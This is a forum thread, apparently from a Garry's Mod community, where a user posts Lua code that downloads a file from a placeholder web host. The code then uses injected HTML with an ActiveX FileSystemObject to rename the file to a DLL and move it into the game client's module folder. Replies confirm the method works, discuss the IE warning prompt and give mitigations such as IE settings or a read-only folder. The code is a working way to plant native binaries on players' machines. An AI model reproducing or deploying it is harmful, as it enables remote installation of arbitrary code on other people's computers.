Lulzy way of getting modules onto the client

I thought of this unusual thing a few months ago and thought I’d share it.

Before anyone gets all mad and I get banned for telling people how to put modules on the client, don’t worry, the client can easily stop it. It actually could be put to legitimate use for servers that have modules required for proper functioning, or to save the client from having to go find gm_bass.

This method uses http.Get to get a binary file from a web server, then in the callback uses the FileScriptingObject in javascript to move and rename the file.
[lua]
local main

local function Callback(contents, size)
file.Write(“asdf.txt”, contents)
main()
end

local function Path()
local u = string.Replace(util.RelativePathToFull("…/garrysmod"),"…\garrysmod","")
u = string.Replace(u,"\","/")
return u
end

main = function()
HTMLTest = vgui.Create(“HTML”)
HTMLTest:SetPos(0, 0)
HTMLTest:SetSize(ScrW(), ScrH())

HTMLTest:SetHTML([[
<html>
<script type='text/javascript'>
function MoveFile() {	
	var fso, f;	
	
	fso = new ActiveXObject('Scripting.FileSystemObject');
	f = fso.GetFile(']] .. Path() .. 'data/asdf.txt' .. [[');
	
	f.name = 'gm_lol.dll';
	f.Move(']] .. Path() .. '/lua/includes/modules/' .. [[');
}

MoveFile()

</script>
<body>
<p>Downloading file...</p>
</body>
</html>]])

end

local function start()
http.Get(“http://website.com/gm_lol.file”, “”, Callback)
end

concommand.Add(“gethtml”, start)
[/lua]

It could obviously be improved to change the contents of the html to whether it was successful or not.

The file needs to be a random extension that is not .dll to function properly.

If you ever get an activex warning in game, only click yes if you completely trust the server you are on, given the fact that you are handing over control of your files to them if you accept.

U hacker. I bet U got this from AzuiSleet.

Have you tested this?

Of course I’ve tested it. The code is a tad modified from what I tested though, so there may be a typo or something.

Do you always get an activex warning?

So basically you send the client a module renamed then use ActiveX to use file rename and move and boom, you’ve got a module.

I think it might use the security settings you have set in Internet Explorer, the default is to ask all the time but it can be set to always ignore it, or always let it work without a warning.

Yes, I can verify this works. IE7 and IE6 warn the user though. This can be disabled.

Before everyone asks how to prevent it:

Control Panel > Internet Options > Security > Custom Level > Disable downloading of ActiveX (Or set to prompt)

Slightly ninja’d!

Useful.

No it isn’t, unless you plan on doing bad things. Then of course we’d all hate you and shun you.

Thanks, now I can send gm_rawio to my clients. :pseudo:

:eng99:

It could be useful if said module was clientside and was required to have? I can’t think of any for this though, but who knows.

I though about this one day beore you posted it :eng99:

[editline]09:18AM[/editline]

IE is full of soooo many security bugs…

This could be useful if you had a module that was required for the proper operation of a gamemode or something, and while it could be used for nefarious purposes, that’s not the only thing it’s good for. And this isn’t a security flaw in IE, it’s supposed to work this way.

This.

But still, i dont want websites being able to move around my files :ohdear:

It’s a huge security risk. Anyone who says yes to that message is allowing the server to do anything to their computer it wants.

I believe that this could be also prevented by making lua/includes/modules -folder read-only.